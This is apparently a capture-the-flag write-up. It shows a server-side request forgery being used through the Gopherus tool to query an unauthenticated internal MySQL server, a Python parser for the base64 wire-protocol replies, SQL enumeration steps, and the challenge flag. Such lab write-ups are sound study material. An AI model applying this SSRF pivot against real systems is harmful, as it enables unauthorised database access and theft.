![43e8a55cc6906b58027ff646aef7d714.png](0ebf6e35dc0d426a8c77cfb6e54397ab.png)
While logged in as admin, we see a **messages** button; clicking it reveals:
![7570a88f3bf06f4f201d61c1ec8ca6b2.png](e34acd03d04343918d1299528f90f1dc.png)
So `brian` has a **mysql** database that isn't password protected. Neat.
The server configuration confirms the existence of a **mysql** server:
![3afe5fdb3181f7c575e4647dd7c0eca3.png](cebf0c3f22874be7afc5283c2796403b.png)
Things we know:
1. brian has a mysql server that doesn't require a password
2. the mysql server is at `10.10.10.53:3306`
3. The server is vulnerable to **SSRF**
There's a tool called **gopherus** that is built for attacking things like **mysql** using **SSRF**. It will build a **gopher** link for us to use:
https://github.com/tarunkant/Gopherus
`gopherus --exploit mysql`
![091fd0f0915d6adf7185a3854a73c72a.png](81b65e0a210e44529e2779fe63818ed9.png)
Adding that **gopher link** to our **CSV** and editing the **url** to match what it says in the config file (10.10.10.53), we get back:
```
Log:
Resp: shipmentID,arrival_date,catalogURL
Resp: SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88VAAAAAAAAAAAAAAdFXx5xdG0xI2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQABwAAAgAAAAIAAAABAAABATYAAAIDZGVmAAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwhAMAAAAD9gRAAAAATAAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA
invalid format!
Cannot import records!
```
More base64
![172daae54d361ddd734d2bee4d2a207e.png](8218a9cd4c09411880759fd12b7de1c6.png)
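The `Resp:` value in the log above is base64 of the raw bytes the MySQL server sent back: its greeting, the login OK and one result set. As an added example (not part of the original writeup), this Python code splits that blob into MySQL wire-protocol packets and extracts the server version, the column name and the rows. The function names are my own, and it assumes a single result set with fewer than 251 columns.

```python
import base64
from itertools import takewhile

# "Resp:" value copied from the import log above (raw MySQL server bytes, base64-encoded).
RESP = (
    "SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88VAAAAAAAAAAAAAAdFXx5xdG0x"
    "I2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQABwAAAgAAAAIAAAABAAABATYAAAIDZGVm"
    "AAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwhAMAAAAD9gRAAAAAT"
    "AAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA"
)

def packets(buf):  # each packet: 3-byte little-endian length, 1-byte sequence id, payload
    pos = 0
    while pos + 4 <= len(buf):
        n = int.from_bytes(buf[pos:pos + 3], "little")
        yield buf[pos + 4:pos + 4 + n]
        pos += 4 + n

def fields(p, n):
    """Read n length-encoded strings from one payload (0xfb encodes NULL)."""
    pos, out = 0, []
    for _ in range(n):
        first, pos = p[pos], pos + 1
        if first == 0xFB:
            out.append(None)
            continue
        size = {0xFC: 2, 0xFD: 3, 0xFE: 8}.get(first, 0)
        length = int.from_bytes(p[pos:pos + size], "little") if size else first
        pos += size
        out.append(p[pos:pos + length].decode("utf-8", "replace"))
        pos += length
    return out

def is_terminator(p):  # EOF packet, or the OK packet that replaces it on newer servers
    return p[0] == 0xFE and len(p) < 9

def parse_response(b64):
    pkts = list(packets(base64.b64decode(b64)))
    # Protocol-10 greeting: 0x0a, then the NUL-terminated server version string.
    version = pkts[0][1:pkts[0].index(0, 1)].decode() if pkts[0][0] == 0x0A else None
    i = 0 if version is None else 1
    while pkts[i][0] == 0x00:                  # skip OK packets (login, `use db`)
        i += 1
    ncols = pkts[i][0]                         # column-count packet
    # Column definition: catalog, schema, table, org_table, name, ...
    columns = [fields(c, 5)[4] for c in pkts[i + 1:i + 1 + ncols]]
    rest = pkts[i + 1 + ncols:]
    if rest and is_terminator(rest[0]):        # classic EOF between columns and rows
        rest = rest[1:]
    rows = [fields(p, ncols) for p in takewhile(lambda p: not is_terminator(p), rest)]
    return {"version": version, "columns": columns, "rows": rows}
```

Calling `parse_response(RESP)` returns the server version string plus the `Database` column with one row per schema.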
Looks like there's a database called `webnote`. Using **gopherus** to issue these commands, we can enumerate the database:
1. `show databases;`
- reveals the database `webnote`
2. `use webnote; show tables;`
- reveals the table `settings`
3. `use webnote; select column_name from information_schema.columns where table_schema = 'webnote' and table_name = 'settings';`
- reveals the columns `apikey` and `note`
4. `use webnote; select note from settings;`
- gives the flag
![5e3131c1295e9cd09e49d84edb86b54b.png](10b86198686349759874cc4dc5753cf9.png)
`flag{bu7_50m37im3s_Y0u_N33d_i11usi0n}`
---
Tags: #ctf #web #ssrf #mysql #sql